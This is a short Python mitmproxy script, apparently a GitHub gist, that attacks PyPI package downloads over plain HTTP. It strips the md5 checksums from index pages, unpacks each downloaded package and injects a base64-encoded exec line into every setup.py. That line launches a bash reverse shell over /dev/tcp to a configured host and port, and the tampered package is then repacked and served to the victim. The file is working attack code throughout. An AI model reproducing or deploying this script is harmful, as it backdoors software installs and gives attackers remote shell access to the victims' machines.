| # -*- coding: utf-8 -*- | |
| # | |
| import tempfile | |
| import sys, os | |
| import re | |
| LHOST, LPORT = ('127.0.0.1', '4444') | |
| PAYLOAD = (r'''os.system('echo "bash -c \'0<&76-;exec 76<>/dev/tcp/%s/%s; | |
| sh <&76 >&76 2>&76\'" | at now 2>/dev/null')''' % (LHOST, LPORT)) | |
| PAYLOAD = PAYLOAD.replace('\n', '') | |
| def response(context, flow): | |
| if not 'Content-Type' in flow.response.headers: | |
| return None | |
| if flow.request.get_url().startswith('http://pypi.python.org/simple/'): | |
| flow.response.content = re.sub(r'#md5=[a-f0-9]+', '', flow.response.content) | |
| if flow.response.headers['Content-Type'][0] == 'application/octet-stream'\ | |
| and flow.request.host == 'pypi.python.org': | |
| tmp_dir = tempfile.mkdtemp() | |
| os.chdir(tmp_dir) | |
| filename = flow.request.get_path_components()[-1] | |
| open(filename, 'wb').write(flow.response.content) | |
| os.mkdir('extracted') | |
| os.system('aunpack -X '+tmp_dir+'/extracted '+filename) | |
| os.system(r'''find . -iname setup.py | xargs sed -i '/setup(/ i\exec ("%''' | |
| '''s".decode("base64"))' ''' % | |
| PAYLOAD.encode('base64').replace('\n', '')) | |
| os.chdir('extracted') | |
| os.system('apack -f ../%s *' % filename) | |
| flow.response.content = open('../%s' % filename, 'rb').read() | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment